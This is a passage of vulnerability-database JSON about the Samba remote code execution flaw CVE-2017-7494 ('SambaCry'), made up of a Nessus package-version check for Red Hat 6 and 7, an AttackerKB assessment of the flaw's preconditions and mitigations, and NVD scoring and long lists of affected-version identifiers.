reference:\"libsmbclient-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libwbclient-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.6-5.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", reference:\"samba-common-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-dc-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-devel-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"samba-pidl-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-python-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-test-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-test-libs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.6-5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.6-5.el6\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ctdb-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", 
reference:\"ctdb-tests-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libsmbclient-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libwbclient-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"libwbclient-devel-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-client-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-client-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"samba-common-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-common-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-common-tools-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-dc-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-dc-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-debuginfo-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-devel-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-krb5-printing-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"samba-pidl-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-python-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-test-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", 
reference:\"samba-test-libs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-vfs-glusterfs-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-4.4.6-5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"samba-winbind-modules-4.4.6-5.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-tests / libsmbclient / libsmbclient-devel / libwbclient / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "100453", "cpe": ["p-cpe:/a:redhat:enterprise_linux:libsmbclient-devel", "p-cpe:/a:redhat:enterprise_linux:samba-krb5-printing", "p-cpe:/a:redhat:enterprise_linux:ctdb-tests", "p-cpe:/a:redhat:enterprise_linux:samba-common-libs", "p-cpe:/a:redhat:enterprise_linux:samba-test-libs", "p-cpe:/a:redhat:enterprise_linux:samba-dc", "p-cpe:/a:redhat:enterprise_linux:samba-python", "p-cpe:/a:redhat:enterprise_linux:samba-devel", "p-cpe:/a:redhat:enterprise_linux:samba-client-libs", "p-cpe:/a:redhat:enterprise_linux:samba", "p-cpe:/a:redhat:enterprise_linux:samba-common-tools", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-clients", "p-cpe:/a:redhat:enterprise_linux:ctdb", "p-cpe:/a:redhat:enterprise_linux:samba-common", "p-cpe:/a:redhat:enterprise_linux:samba-vfs-glusterfs", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-modules", "p-cpe:/a:redhat:enterprise_linux:libwbclient-devel", "p-cpe:/a:redhat:enterprise_linux:libsmbclient", 
"cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:libwbclient", "p-cpe:/a:redhat:enterprise_linux:samba-winbind-krb5-locator", "p-cpe:/a:redhat:enterprise_linux:samba-pidl", "p-cpe:/a:redhat:enterprise_linux:samba-client", "p-cpe:/a:redhat:enterprise_linux:samba-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:samba-dc-libs", "p-cpe:/a:redhat:enterprise_linux:samba-winbind", "p-cpe:/a:redhat:enterprise_linux:samba-libs", "p-cpe:/a:redhat:enterprise_linux:samba-test"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}
{"attackerkb": [{"lastseen": "2021-01-28T21:27:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at April 14, 2020 4:47pm UTC reported:\n\nThis vulnerability was the Linux equivalent to WannaCry according to some journalists. It was not. \nThis vulnerability (AKA SambaCry) worked by writing a link library (.so file) to a Linux host running Samba in such a way that Samba then loaded it. On the face of it, this was a problem, but attackers had 2 large hurdles:\n\n 1. Anonymous file creation had to be enabled and \n\n 2. Attackers had to guess the right absolute path \n\n\nIn the first case, it is unlikely any enterprise will have anonymous file creation turned on, so immediately attackers are thwarted. In the second case, an attacker must guess the absolute path to the share as it is mounted on the remote computer. There are obvious guesses attackers could make, but nothing that was guaranteed. This was the classic example of a terrifying exploit mitigated by large caveats. 
Most common-sense approaches to SAMBA and SMB shares will mitigate this threat, namely not opening SMB/SAMBA shares to the internet, not allowing anonymous logins, and keeping software up to date.\n", "modified": "2020-07-30T00:00:00", "published": "2017-05-30T00:00:00", "id": "AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4", "href": "https://attackerkb.com/topics/1qZ2S85EjE/cve-2017-7494", "type": "attackerkb", "title": "CVE-2017-7494", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:36:50", "description": "Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution vulnerability, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-30T18:29:00", "title": "CVE-2017-7494", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7494"], "modified": "2018-10-21T10:29:00", "cpe": ["cpe:/a:samba:samba:4.0.6", "cpe:/a:samba:samba:4.5.7", 
"cpe:/a:samba:samba:4.0.8", "cpe:/a:samba:samba:3.5.5", "cpe:/a:samba:samba:4.1.4", "cpe:/a:samba:samba:4.1.8", "cpe:/a:samba:samba:4.2.11", "cpe:/a:samba:samba:4.4.7", "cpe:/a:samba:samba:4.2.2", "cpe:/a:samba:samba:4.5.6", "cpe:/a:samba:samba:3.5.17", "cpe:/a:samba:samba:4.1.10", "cpe:/a:samba:samba:4.0.19", "cpe:/a:samba:samba:4.1.5", "cpe:/a:samba:samba:4.4.3", "cpe:/a:samba:samba:4.4.5", "cpe:/a:samba:samba:4.0.22", "cpe:/a:samba:samba:4.4.8", "cpe:/a:samba:samba:3.5.8", "cpe:/a:samba:samba:3.6.13", "cpe:/a:samba:samba:3.5.11", "cpe:/a:samba:samba:3.6.18", "cpe:/a:samba:samba:4.0.4", "cpe:/a:samba:samba:4.2.4", "cpe:/a:samba:samba:4.5.4", "cpe:/a:samba:samba:3.5.13", "cpe:/a:samba:samba:4.4.11", "cpe:/a:samba:samba:4.6.1", "cpe:/a:samba:samba:4.5.9", "cpe:/a:samba:samba:3.5.12", "cpe:/a:samba:samba:4.1.13", "cpe:/a:samba:samba:4.1.19", "cpe:/a:samba:samba:4.6.3", "cpe:/a:samba:samba:4.3.7", "cpe:/a:samba:samba:4.0.15", "cpe:/a:samba:samba:3.6.25", "cpe:/a:samba:samba:4.1.20", "cpe:/a:samba:samba:4.2.6", "cpe:/a:samba:samba:3.6.19", "cpe:/a:samba:samba:3.6.7", "cpe:/a:samba:samba:3.6.24", "cpe:/a:samba:samba:3.6.21", "cpe:/a:samba:samba:3.5.19", "cpe:/a:samba:samba:4.4.13", "cpe:/a:samba:samba:4.0.12", "cpe:/a:samba:samba:4.5.5", "cpe:/a:samba:samba:4.0.3", "cpe:/a:samba:samba:4.2.8", "cpe:/a:samba:samba:4.3.11", "cpe:/a:samba:samba:3.5.15", "cpe:/a:samba:samba:4.5.0", "cpe:/a:samba:samba:4.3.4", "cpe:/a:samba:samba:4.2.14", "cpe:/a:samba:samba:4.4.12", "cpe:/a:samba:samba:4.1.17", "cpe:/a:samba:samba:4.1.1", "cpe:/a:samba:samba:4.3.3", "cpe:/a:samba:samba:4.0.24", "cpe:/a:samba:samba:4.0.2", "cpe:/a:samba:samba:4.0.7", "cpe:/a:samba:samba:3.6.2", "cpe:/a:samba:samba:3.6.14", "cpe:/a:samba:samba:3.5.2", "cpe:/a:samba:samba:4.3.1", "cpe:/a:samba:samba:4.0.16", "cpe:/a:samba:samba:3.5.21", "cpe:/a:samba:samba:3.6.12", "cpe:/a:samba:samba:3.5.6", "cpe:/a:samba:samba:4.0.11", "cpe:/a:samba:samba:4.0.25", "cpe:/a:samba:samba:4.0.9", "cpe:/a:samba:samba:3.6.10", 
"cpe:/a:samba:samba:4.1.6", "cpe:/a:samba:samba:4.1.12", "cpe:/a:samba:samba:4.1.21", "cpe:/a:samba:samba:3.6.9", "cpe:/a:samba:samba:3.6.0", "cpe:/a:samba:samba:4.2.5", "cpe:/a:samba:samba:4.0.10", "cpe:/a:samba:samba:4.0.23", "cpe:/a:samba:samba:4.2.12", "cpe:/a:samba:samba:4.1.0", "cpe:/a:samba:samba:4.5.2", "cpe:/a:samba:samba:3.5.22", "cpe:/a:samba:samba:3.6.11", "cpe:/a:samba:samba:4.6.5", "cpe:/a:samba:samba:4.1.23", "cpe:/a:samba:samba:4.0.14", "cpe:/a:samba:samba:4.1.7", "cpe:/a:samba:samba:4.0.26", "cpe:/a:samba:samba:4.0.1", "cpe:/a:samba:samba:4.1.22", "cpe:/a:samba:samba:4.2.0", "cpe:/a:samba:samba:3.5.14", "cpe:/a:samba:samba:3.6.1", "cpe:/a:samba:samba:4.5.3", "cpe:/a:samba:samba:3.6.17", "cpe:/a:samba:samba:4.2.10", "cpe:/a:samba:samba:4.2.7", "cpe:/a:samba:samba:3.6.20", "cpe:/a:samba:samba:3.5.20", "cpe:/a:samba:samba:4.3.9", "cpe:/a:samba:samba:4.4.4", "cpe:/a:samba:samba:3.6.3", "cpe:/a:samba:samba:3.6.8", "cpe:/a:samba:samba:4.0.5", "cpe:/a:samba:samba:4.2.9", "cpe:/a:samba:samba:4.0.13", "cpe:/a:samba:samba:4.0.21", "cpe:/a:samba:samba:3.6.6", "cpe:/a:samba:samba:4.4.6", "cpe:/a:samba:samba:4.6.2", "cpe:/a:samba:samba:3.5.10", "cpe:/a:samba:samba:4.1.9", "cpe:/a:samba:samba:3.6.16", "cpe:/a:samba:samba:4.4.1", "cpe:/a:samba:samba:4.1.18", "cpe:/a:samba:samba:3.6.22", "cpe:/a:samba:samba:3.5.7", "cpe:/a:samba:samba:3.6.4", "cpe:/a:samba:samba:3.5.3", "cpe:/a:samba:samba:3.6.15", "cpe:/a:samba:samba:4.1.16", "cpe:/a:samba:samba:3.6.23", "cpe:/a:samba:samba:3.5.16", "cpe:/a:samba:samba:4.3.8", "cpe:/a:samba:samba:3.5.0", "cpe:/a:samba:samba:4.4.9", "cpe:/a:samba:samba:4.1.14", "cpe:/a:samba:samba:4.3.6", "cpe:/a:samba:samba:4.5.1", "cpe:/a:samba:samba:4.4.0", "cpe:/a:samba:samba:4.2.1", "cpe:/a:samba:samba:4.2.13", "cpe:/a:samba:samba:3.5.4", "cpe:/a:samba:samba:4.6.0", "cpe:/a:samba:samba:4.3.5", "cpe:/a:samba:samba:4.1.11", "cpe:/a:samba:samba:4.4.2", "cpe:/a:samba:samba:4.0.20", "cpe:/a:samba:samba:4.1.15", "cpe:/a:samba:samba:4.2.3", 
"cpe:/a:samba:samba:4.3.10", "cpe:/a:samba:samba:4.0.0", "cpe:/a:samba:samba:3.5.9", "cpe:/a:samba:samba:4.3.2", "cpe:/a:samba:samba:3.6.5", "cpe:/a:samba:samba:3.5.1", "cpe:/a:samba:samba:4.5.8", "cpe:/a:samba:samba:4.3.0", "cpe:/a:samba:samba:4.0.17", "cpe:/a:samba:samba:4.0.18", "cpe:/a:samba:samba:3.5.18", "cpe:/a:samba:samba:4.1.3", "cpe:/a:samba:samba:4.4.10", "cpe:/a:samba:samba:4.1.2"], "id": "CVE-2017-7494", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-7494", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:samba:samba:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.25:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:4.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.19:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.26:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:4.4.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.16:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.21:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.12:*:*:*:*:*:*:*", 
"cpe:2.3:a:samba:samba:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.23:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.17:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:3.6.18:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:samba:samba:4.1.7:*:*:*:*:*:*:*", 